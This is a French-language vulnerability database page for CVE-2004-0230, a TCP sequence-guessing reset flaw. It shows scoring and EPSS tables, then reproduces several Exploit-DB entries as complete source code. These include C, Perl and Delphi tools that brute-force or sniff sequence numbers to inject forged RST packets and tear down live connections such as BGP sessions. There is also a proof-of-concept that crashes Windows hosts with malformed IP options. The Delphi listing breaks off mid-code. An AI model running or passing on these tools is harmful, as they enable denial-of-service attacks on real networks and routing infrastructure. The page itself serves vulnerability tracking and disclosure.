CVE-2004-0230

EPSS

8.13%V4

Vecteur

Network

Publié

2004-05-05
02h00 +00:00

Modifié

2018-10-19
12h57 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP.

Informations du CVE

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:N/A:P	nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	17.79%	–	–
2022-04-03	–	–	17.79%	–	–
2023-03-12	–	–	–	0.27%	–
2023-04-09	–	–	–	0.27%	–
2023-09-17	–	–	–	0.27%	–
2024-02-11	–	–	–	0.27%	–
2024-03-24	–	–	–	0.27%	–
2024-06-02	–	–	–	0.27%	–
2024-07-14	–	–	–	0.27%	–
2024-08-04	–	–	–	0.27%	–
2024-08-11	–	–	–	0.27%	–
2024-09-22	–	–	–	0.27%	–
2024-10-20	–	–	–	0.27%	–
2024-10-27	–	–	–	0.27%	–
2024-12-22	–	–	–	1.95%	–
2025-02-02	–	–	–	1.95%	–
2025-01-19	–	–	–	1.95%	–
2025-02-02	–	–	–	1.95%	–
2025-03-18	–	–	–	–	4.1%
2025-03-30	–	–	–	–	8.13%
2025-03-30	–	–	–	–	8.13,%

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Date	Percentile
2022-02-06	93%
2022-04-03	96%
2023-03-12	62%
2023-04-09	63%
2023-09-17	64%
2024-02-11	65%
2024-03-24	66%
2024-06-02	66%
2024-07-14	67%
2024-08-04	66%
2024-08-11	67%
2024-09-22	66%
2024-10-20	66%
2024-10-27	67%
2024-12-22	88%
2025-02-02	89%
2025-01-19	88%
2025-02-02	89%
2025-03-18	88%
2025-03-30	91%
2025-03-30	91%

Informations sur l'Exploit

Exploit Database EDB-ID : 291

Date de publication : 2004-04-22 22h00 +00:00
Auteur : Paul A. Watson
EDB Vérifié : Yes

/* By: Paul A. Watson Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1 COMPILE: gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a or gcc -o reset-tcp reset-tcp.c -lnet ** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems! EXECUTE: reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size] EXAMPLE (and timing packets sent with /bin/date): [root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date Tue Dec 16 21:18:28 CST 2003 Packets sent: 8192 Sequence guess: 536805376 Packets sent: 16384 Sequence guess: 1073676288 Packets sent: 24576 Sequence guess: 1610547200 Packets sent: 32768 Sequence guess: 2147418112 Packets sent: 40960 Sequence guess: 2684289024 Packets sent: 49152 Sequence guess: 3221159936 Packets sent: 57344 Sequence guess: 3758030848 packets sent: 65535 Tue Dec 16 21:18:46 CST 2003 [root@orc BGP]# */ /* modified by: J. Barber A.K.A Swoop modified to use src mac from your interface and asks for the destination mac on the command line. New Command-Line Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536 swoopafied: 3/30/04 */ #include <libnet.h> #include <stdio.h> int main(int argc, char *argv[]) { int c; unsigned long int count=0; unsigned long int count2=0; unsigned long int seqguess=0; unsigned long int seqstart=0; unsigned long int seqincrement=0; unsigned long int seqmax=4294967295; u_char *cp; libnet_t *l; libnet_ptag_t t; char *payload; char * device = argv[1]; u_short payload_s; u_long src_ip, dst_ip; u_short src_prt, dst_prt; char errbuf[LIBNET_ERRBUF_SIZE]; char sourceip[32] = ""; char destinationip[32] = ""; /* Change these to suit your local environment values */ /* Make enet_dst either the default gateway or destination host */ struct libnet_ether_addr *ptr_enet_src; u_char enet_src[6]; u_char enet_dst[6]; u_char org_code[3] = {0x00, 0x00, 0x00}; /* Its only test code, so minimal checking is performed... */ if (argc<8) { printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n"); printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] [window size]\n",argv[0]); printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n"); exit(1); } strcpy(sourceip,argv[2]); src_prt = atoi(argv[3]); strcpy(destinationip,argv[4]); dst_prt = atoi(argv[5]); seqincrement= atoi(argv[7]); seqstart= 0; seqmax = 4294967295; /* 2^32 */ payload = NULL; payload_s = 0; src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE); dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE); memset(enet_dst, 0, sizeof(enet_dst)); sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0], &enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4], &enet_dst[5]); l = libnet_init(LIBNET_LINK,device,errbuf); ptr_enet_src = libnet_get_hwaddr(l); memcpy(&enet_src[0], ptr_enet_src,6); printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3], enet_src[4],enet_src[5]); printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3], enet_dst[4],enet_dst[5]); for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) { count++; count2++; if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); } l = libnet_init(LIBNET_LINK,device,errbuf); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0); t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0); t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0); c = libnet_write(l); } printf("packets sent: %i\n",count); return (EXIT_FAILURE); }

Exploit Database EDB-ID : 24030

Date de publication : 2004-03-04 23h00 +00:00
Auteur : Matt Edman
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/10183/info A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. Few factors may present viable target implementations, such as imlementations that: - depend on long-lived TCP connections - have known or easily guessed IP address endpoints - have known or easily guessed TCP source ports. Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms. Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions. /****************************************************************************************** * autoRST * Matt Edman - Baylor University * 5/3/2004 * * DESCRIPTION: * Sniffs out TCP connections on a non-switched network and attempts to reset them * by forging a RST packet in the correct window * * REQUIRED LIBRARIES: * -WinPCAP 3.1beta or higher * -WinPCAP developer's pack * * NOTES: * Just make sure you have WinPCAP 3.1beta or higher installed and the appropriate * winpcap header files downloaded and paths setup. Other than that, just start it * up and let it do its job. ******************************************************************************************/ #include <stdio.h> // WinPCAP includes #include <pcap.h> #include <remote-ext.h> // 6 byte MAC Address typedef struct mac_address { u_char byte1; u_char byte2; u_char byte3; u_char byte4; u_char byte5; u_char byte6; }mac_address; // 4 bytes IP address typedef struct ip_address{ u_char byte1; u_char byte2; u_char byte3; u_char byte4; }ip_address; // 20 bytes IP Header typedef struct ip_header{ u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits) u_char tos; // Type of service u_short tlen; // Total length u_short identification; // Identification u_short flags_fo; // Flags (3 bits) + Fragment offset (13 bits) u_char ttl; // Time to live u_char proto; // Protocol u_short crc; // Header checksum ip_address saddr; // Source address ip_address daddr; // Destination address // u_int op_pad; // Option + Padding -- NOT NEEDED! }ip_header; // 20 bytes TCP Header typedef struct tcp_header { u_short sport; // Source port u_short dport; // Destination port u_int seqnum; // Sequence Number u_int acknum; // Acknowledgement number u_char hlen; // Header length u_char flags; // packet flags u_short win; // Window size u_short crc; // Header Checksum u_short urgptr; // Urgent pointer...still don't know what this is... }tcp_header; // FUNCTION PROTOTYPES void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data); void print_packet( u_char *pkt, int len ); void send_reset( mac_address *srcmac, ip_address *srcip, u_short sport, mac_address *destmac, ip_address *destip, u_short dport, u_int seqnum, u_int win ); u_int iptoUINT( ip_address *ip ); u_short csum (unsigned short *buf, int nwords); // GLOBAL VARIABLES pcap_t *adhandle; // The device handle u_int localaddr; // Local IP Address struct sockaddr_in *lSock; // Local socket structure int main( int argc, char *argv[] ) { pcap_if_t *alldevs; pcap_if_t *d; int inum; int i=0; char errbuf[PCAP_ERRBUF_SIZE]; char *localIP; // Get the list of adapters if ( pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1 ) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); return 0; } // Print the list of adapters -- from Winpcap sample code for( d = alldevs; d != NULL; d = d->next ) { printf("%d. %s", ++i, d->name); if ( d->description ) printf(" (%s)\n", d->description); else printf(" (No description available)\n"); } printf("Enter the interface number (1-%d):",i); scanf("%d", &inum); // Traverse the list to the selected adapter for( d = alldevs, i = 0; i < inum-1; d = d->next, i++); // Get the local address lSock = (struct sockaddr_in *)(d->addresses->addr); localaddr = lSock->sin_addr.S_un.S_addr; printf("%d\n", localaddr); localIP = inet_ntoa(lSock->sin_addr); printf("Local Addr: %s\n", localIP); // Open the device for the capture if ( (adhandle = pcap_open( d->name,65536, PCAP_OPENFLAG_PROMISCUOUS, 10, NULL, errbuf ) ) == NULL) { fprintf(stderr,"\nUnable to open adapter: %s \n", d->name); pcap_freealldevs(alldevs); return -1; } printf("\nListening on %s...\n", d->description); pcap_freealldevs(alldevs); pcap_loop(adhandle, 0, packet_handler, NULL); return 0; } // CALLBACK function...called for each received packet void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data) { u_int ip_len; mac_address *srcmac; mac_address *destmac; ip_header *iph; tcp_header *tcph; destmac = (mac_address *)pkt_data; srcmac = (mac_address *)(pkt_data + 6); iph = (ip_header *) (pkt_data + 14); if( iph->proto == 0x06 ) { // TCP PACKETS if( localaddr != iptoUINT( &iph->saddr ) && localaddr != iptoUINT( &iph->daddr ) ) { // Don't reset our own connection ip_len = (iph->ver_ihl & 0xf) * 4; tcph = (tcp_header *)(pkt_data + 14 + ip_len); if( tcph->flags != 0x04 ) // If the RST flag is already set, no need sending another RST packet send_reset( srcmac, &iph->saddr, tcph->sport, destmac, &iph->daddr, tcph->dport, tcph->acknum, tcph->win ); } } } // Attempts to forge a RST packet and send it back to the source, resetting the TCP connection void send_reset( mac_address *srcmac, ip_address *srcip, u_short sport, mac_address *destmac, ip_address *destip, u_short dport, u_int seqnum, u_int win ) { u_short tcp_hdrcrc[16]; u_short ip_hdrcrc[10]; u_short tcp_tos = htons(0x06); u_short tcp_hlen = htons(0x14); u_short ip_tos = htons(0x0800); ip_header iph; tcp_header tcph; u_char pkt[54]; printf("Attempting to Reset: %d.%d.%d.%d:%d -> %d.%d.%d.%d:%d\n", srcip->byte1, srcip->byte2, srcip->byte3, srcip->byte4, ntohs(sport), destip->byte1, destip->byte2, destip->byte3, destip->byte4, ntohs(dport)); // Setup IP Header iph.ver_ihl = 0x45; iph.tos = 0x01; iph.tlen = htons(40); iph.identification = htons(0x0800); iph.flags_fo = 0x0; iph.ttl = 0xff; iph.proto = 0x06; iph.crc = 0x00; iph.saddr = *destip; // swap the source & dest ips iph.daddr = *srcip; // Setup TCP Header tcph.sport = dport; // swap the source & dest ports tcph.dport = sport; tcph.seqnum = htonl(ntohl(seqnum) + ntohs(win) - 2); tcph.acknum = tcph.seqnum + htonl(0x1); tcph.hlen = 0x50; tcph.flags = 0x04; tcph.win = win; tcph.urgptr = 0x00; tcph.crc = 0x00; // Calculate the IP Header Checksum memset(ip_hdrcrc, 0, 20); memcpy(ip_hdrcrc, &iph, 20); iph.crc = csum( ip_hdrcrc, 10 ); // Construct the tcp pseudo-header for checksum calculation memset(tcp_hdrcrc, 0, 32); memcpy(tcp_hdrcrc, &tcph, 20); memcpy(&tcp_hdrcrc[10], &iph.saddr, 4); memcpy(&tcp_hdrcrc[12], &iph.daddr, 4); memcpy(&tcp_hdrcrc[14], &tcp_tos, 2); memcpy(&tcp_hdrcrc[15], &tcp_hlen, 2); tcph.crc = csum( tcp_hdrcrc, 16 ); // Assemble the packet memcpy( pkt, (void *)srcmac, 6 ); memcpy( (void *)(pkt + 6), (void *)destmac, 6 ); memcpy( (void *)(pkt + 12), &ip_tos, 2); memcpy( (void *)(pkt + 14), &iph, 20 ); memcpy( (void *)(pkt + 14 + sizeof( ip_header )), &tcph, 20 ); // Send the packet if (pcap_sendpacket(adhandle, pkt, sizeof( pkt )) != 0) fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle)); } // Calculates the TCP Checksum based on the helper header u_short csum (unsigned short *buf, int nwords) { unsigned long sum=0; for( sum=0; nwords > 0; nwords-- ) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return (u_short)~sum; } // Takes in an ip_address structure and returns the equivalent 4byte UINT value u_int iptoUINT( ip_address *ip ) { u_int ipaddr; ipaddr = ip->byte4 | (ip->byte3 << 8); ipaddr = ipaddr | (ip->byte2 << 16); ipaddr = ipaddr | (ip->byte1 << 24); return htonl(ipaddr); } // Display the values in the packet on the screen void print_packet( u_char *pkt, int len ) { int i; printf("\tThe Packet\n------------------------------\n"); for( i = 0; i < len; i++ ) { if(i%4==0) printf("\n"); printf("0x%x ", pkt[i]); } printf("\n"); }

Exploit Database EDB-ID : 24031

Date de publication : 2004-04-19 22h00 +00:00
Auteur : Paul A. Watson
EDB Vérifié : Yes

Exploit Database EDB-ID : 24032

Date de publication : 2004-04-19 22h00 +00:00
Auteur : Paul Watson
EDB Vérifié : Yes

Exploit Database EDB-ID : 24033

Date de publication : 2004-04-22 22h00 +00:00
Auteur : K-sPecial
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/10183/info A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. Few factors may present viable target implementations, such as imlementations that: - depend on long-lived TCP connections - have known or easily guessed IP address endpoints - have known or easily guessed TCP source ports. Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms. Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions. use Net::RawIP; ## Kreator -> K-sPecial [http://xzziroz.freeshell.org] ## Date -> 4-23-2004 ## Name -> Kreset.pl ## Version -> 1.0 ## ## Use -> Used to reset a TCP connecting. ## (Using the slipping throught he window meathod described on 4-20-04) ## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm ## ## Usage -> If you don't fuckin know how to use it, don't use it. ## ## Other -> I played around on nix for a few hours to get the idea down ## pat. I set up an IRCD and connected to it, looked at tcpdump to ## get irssi's local port. irssi's window size was larger so I figured ## i would pretend to be sending RST from server, irssi window ## was around ## 30K while ircd window around 3K, big difference :D. So I enter values ## and since the connection is loop back, i used 0.0 seconds between ## packets. ## it only took a few minutes to disconnect with a 0.0 overlay and ## a 30K window starting at sequence number 0. Only problem over ## the internet, is finding the port of each side, sure you know the ## servers port but not the clients. I got to sequence number 1512500 ## using a .10 second delay and a window size of 2500. Sequence ## numbers are ## 32 bit numbers, 32 1's comes out to be 4294967295. ## Do the math, and you know precisely how long it takes to cover ## every sequence RANGE of a given port using a given window size. ## Window sizes should be based on application layer program. ## ## NOTE -> This script assumes you know at least one of the ports, ## if the case is otherwise ## then the script can easily be modified to work around this. Also, ## this was written for ## UNIX variants. print <<EOF; -> Kreset.pl by K-sPecial [4-23-2004] -> Used to reset a connection based on the slipping -> through the window meathod, exploited publicly on 4-20-2004. -> [http://xzziroz.freeshell.org] -> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey -> eightball, unmanarc, Buuyo^, and whomever else I forgot. EOF print "\r\nDo you want a port range for the source IP, or the dest IP?"; print "\r\nIf you want it for the source, type 1, otherwise 2."; print "\r\nIf you don't want it for either, type one or the other: "; chomp (my $choice = <STDIN>); unless ($choice == 1 || $choice == 2) { print "\r\nEnter 1, or 2.\r\n"; exit(1); } print "\r\nEnter source IP: "; chomp (my $sip = <STDIN>); if ($choice == 2) { print "\r\nEnter source port: "; chomp ($sport = <STDIN>); if (!($sport)) { print "\r\nYou must fill in a source port.\r\n"; } } print "\r\nEnter dest IP: "; chomp (my $dip = <STDIN>); if ($choice == 1) { print "\r\nEnter dest port: "; chomp ($dport = <STDIN>); if (!($dport)) { print "\r\nYou must fill in a destination port.\r\n"; exit(1); } } print "\r\nEnter begin port: "; chomp (my $bport = <STDIN>); print "\r\nEnter end port: "; chomp (my $eport = <STDIN>); if (!($sip) || !($dip) || !($bport) || !($eport)) { print "\r\nYou forgot to fill in one or more fields.\r\n"; exit(1); ## Yea hahah we don't exit (0) anymore. LOL } print "\r\nDestinations guessed window size,"; print "\r\nIf you don't define this, we will try small (2500): "; chomp (my $winsize = <STDIN>); ## Why did the window cross the road? if (!($winsize)) { $winsize = 2500; } print "\r\nStarting sequence number,"; print "\r\nIf you don't define this, we will start at 0: "; chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers if (!($seqnum)) { ## from getting through! $seqnum = 0; } print "\r\nNumber of seconds to wait between each packet sent,"; print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO"; print "\r\nINDICATE NO MINUTES: 0.10 == 10 ms, 0.0 = 0 ms"; print "\r\nIf you don't define this, we will use 0.10: "; chomp (my $ms = <STDIN>); if (!($ms)) { $ms = "0.10"; } print <<EOF; Source IP is -> $sip Source port is -> $sport Destination IP is -> $dip Guessed window size is -> $winsize Starting sequence number is -> $seqnum Loop wait is -> $ms Begin port is -> $bport End port is -> $eport EOF print "Destination port is -> $dport\r\n" if $dport; print "Source port is -> $sport\r\n" if $sport; print "\r\n"; my $i = $seqnum; ## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES! ## P.S K-sPecial's hopes yours usings a nix variants or this selects ## tricks just mights nots works. for ($i; 1; $i += $winsize) { if ($i > 4294967295) { $bport++; if ($bport > $eport) { print "Finished\r\n"; exit(0); } else { print "Looping next port.\r\n"; $i = $seqnum; sleep(2); next; } } if ($choice == 2) { $dport = $bport; } else { $sport = $bport; } select(undef, undef, undef, $ms); print "Sequence Number is -> $i port is -> $bport\r\n"; $a = new Net::RawIP; $a->set({ip => {saddr => "$sip",daddr => "$dip"}, tcp => {source => $sport,dest => $dport,rst => 1, syn => 1, seq => $i}}) ; $a->send; }

Exploit Database EDB-ID : 942

Date de publication : 2005-04-16 22h00 +00:00
Auteur : Yuri Gushin
EDB Vérifié : Yes

/* ecl-winipdos.c - 16/04/05 * Yuri Gushin <yuri@eclipse.org.il> * Alex Behar <alex@eclipse.org.il> * * This one was actually interesting, an off-by-one by our beloved * M$ :) * * When processing an IP packet with an option size (2nd byte after * the option) of 39, it will crash - since the maximum available * size is 40 for the whole IP options field, and two are already used: * [ OPT ] [ SIZE ] [ 38 more bytes ] * Checks are done to validate that the option-size field is less than * 40, where a value less than !39! should be checked for validation. * * Note that this doesn't affect ALL options, and is also dependant upon * the underlying protocol. * Anyways, a small PoC to see how it works and why, tweak test and * explore, have fun :) * * * Greets fly out to the ECL crew, Valentin Slavov, blexim, stranger, * manevski, elius, shrink, Evgeny Pinchuk, Ishay Sommer, and anyone else * who got left out :D * */ #ifndef _BSD_SOURCE #define _BSD_SOURCE #endif #include <stdio.h> #include <string.h> #include <time.h> #include <libnet.h> #define IP_H 20 #define IPOPTS_MAX 40 void banner(); void usage(char *); int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; char *device = NULL; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct tcphdr *TCP; u_int32_t src = 0, dst = 0; banner(); if (argc < 4) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved source address\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved destination address\n"); exit(-1); } if ( (buf = malloc(IP_MAXPACKET)) == NULL ) { perror("malloc"); exit(-1); } buf[20] = atoi(argv[3]); buf[21] = 39; // our malformed size for (c = 0; c<38; c+=3) strncpy(&buf[22+c], "ECL", 3); // padding TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX); TCP->th_off = 5; packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2); srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_TCP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; TCP->th_sport = htons(1337); TCP->th_dport = htons(80); TCP->th_seq = 0; TCP->th_ack = 0; TCP->th_x2 = 0; TCP->th_flags = TH_SYN; TCP->th_win = rand() & 0xffff; TCP->th_sum = 0; TCP->th_urp = 0; libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("Packet sent.\n"); libnet_destroy(l); free(buf); return (0); } void usage(char *cmd) { printf("Usage: %s <source> <destination> <option>\n",cmd); exit(-1); } void banner() { printf("\t\tWindows malformed IP Options DoS exploit\n" "\t\t Yuri Gushin <yuri@eclipse.org.il>\n" "\t\t Alex Behar <alex@eclipse.org.il>\n" "\t\t\t ECL Team\n\n\n"); } // milw0rm.com [2005-04-17]

Exploit Database EDB-ID : 276

Date de publication : 2004-04-21 22h00 +00:00
Auteur : Aphex
EDB Vérifié : Yes

{ AFX TCP Reset by Aphex http://www.iamaphex.cjb.net unremote@knology.net Compile with Delphi 5/6/7 } program Project1; {$APPTYPE CONSOLE} uses Windows; type TBufferArray = array[0..65535] of byte; type iph = record ip_verlen: byte; ip_tos: byte; ip_len: word; ip_id: word; ip_offset: word; ip_ttl: byte; ip_protocol: byte; ip_checksum: word; ip_saddr: longword; ip_daddr: longword; end; tcph = record th_sport: word; th_dport: word; th_seq: longword; th_ack: longword; th_len: byte; th_flags: byte; th_win: word; th_checksum: word; th_upr: word; end; sb = packed record sb1, sb2, sb3, sb4: char; end; sw = packed record sw1, sw2: word; end; TInAddr = record case integer of 0: (ssb: sb); 1: (ssw: sw); 2: (saddr: longint); end; TSockAddr = record case integer of 0: (sin_family: word; sin_port: word; sin_addr: TInAddr; sin_zero: array[0..7] of char); 1: (sa_family: word; sa_data: array[0..13] of char) end; TWSAData = record ver: Word; hgh: Word; dsc: array[0..256] of char; sys: array[0..128] of char; skt: Word; udp: Word; ven: PChar; end; function closesocket(sk: integer): integer; stdcall; external 'WS2_32.DLL' name 'closesocket'; function htons(hs: word): word; stdcall; external 'WS2_32.DLL' name 'htons'; function htonl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl'; function ntohl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl'; function inet_addr(cp: pchar): longint; stdcall; external 'WS2_32.DLL' name 'inet_addr'; function sendto(sk: integer; var bf; ln, fl: integer; var ad: TSockAddr; le: integer): integer; stdcall; external 'WS2_32.DLL' name 'sendto'; function setsockopt(sk: integer; lv, op: integer; ov: PChar; ol: integer): integer; stdcall; external 'WS2_32.DLL' name 'setsockopt'; function socket(af, st, pr: integer): integer; stdcall; external 'WS2_32.DLL' name 'socket'; function WSACleanup: integer; stdcall; external 'WS2_32.DLL' name 'WSACleanup' function WSAGetLastError: integer; stdcall; external 'WS2_32.DLL' name 'WSAGetLastError'; function WSAStartup(vr: word; var ws: TWSAData): integer; stdcall; external 'WS2_32.DLL' name 'WSAStartup'; const INVALID_SOCKET = integer(not(0)); var hSocket: integer; WindowPos: int64; WindowCount: dword; WindowSize: dword; TargetHost: string; TargetPort: word; SourceHost: string; SourcePort: word; Odds: dword; Delay: dword; function CheckSum(var Buffer; Size: integer): word; type TWordArray = Array[0..1] of word; var lSumm: LongWord; iLoop: integer; begin lSumm := 0; iLoop := 0; while Size > 1 do begin lSumm := lSumm + TWordArray(Buffer)[iLoop]; inc(iLoop); Size := Size - SizeOf(word); end; if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]); lSumm := (lSumm shr 16) + (lSumm and $FFFF); lSumm := lSumm + (lSumm shr 16); Result := word(not lSumm); end; procedure Header(FromIP: string; FromPort: word; ToIP: string; ToPort: word; Seq: longint; Window: longint; var Buffer: TBufferArray; var Socket: TSockAddr; var Size: word); var ipHdr: iph; tcpHdr: tcph; TcpHeaderLen: word; ChecksumSize: word; DataPointer: ^byte; procedure IncPtr(Value: integer); begin DataPointer := pointer(integer(DataPointer) + Value); end; begin Size := sizeof(ipHdr) + sizeof(tcpHdr); ipHdr.ip_verlen := ((4 shl 4) or sizeof(ipHdr) div sizeof(longword)); ipHdr.ip_tos := 0; ipHdr.ip_len := htons(Size); ipHdr.ip_id := 0; ipHdr.ip_offset := 0; ipHdr.ip_ttl := 128; ipHdr.ip_protocol := 6; ipHdr.ip_checksum := 0; ipHdr.ip_saddr := inet_addr(pchar(FromIP)); ipHdr.ip_daddr := inet_addr(pchar(ToIP)); ChecksumSize := 0; tcpHdr.th_sport := htons(FromPort); tcpHdr.th_dport := htons(ToPort); tcpHdr.th_seq := htonl(Seq); tcpHdr.th_ack := htonl(Seq + Window); tcpHdr.th_len := 80; tcpHdr.th_flags := 20; tcpHdr.th_win := Window; tcpHdr.th_checksum := 0; tcpHdr.th_upr := 0; DataPointer := @Buffer[0]; FillChar(Buffer, SizeOf(Buffer), 0); Move(ipHdr.ip_saddr, DataPointer^, SizeOf(ipHdr.ip_saddr)); IncPtr(SizeOf(ipHdr.ip_saddr)); ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_saddr); Move(ipHdr.ip_daddr, DataPointer^, sizeof(ipHdr.ip_daddr)); 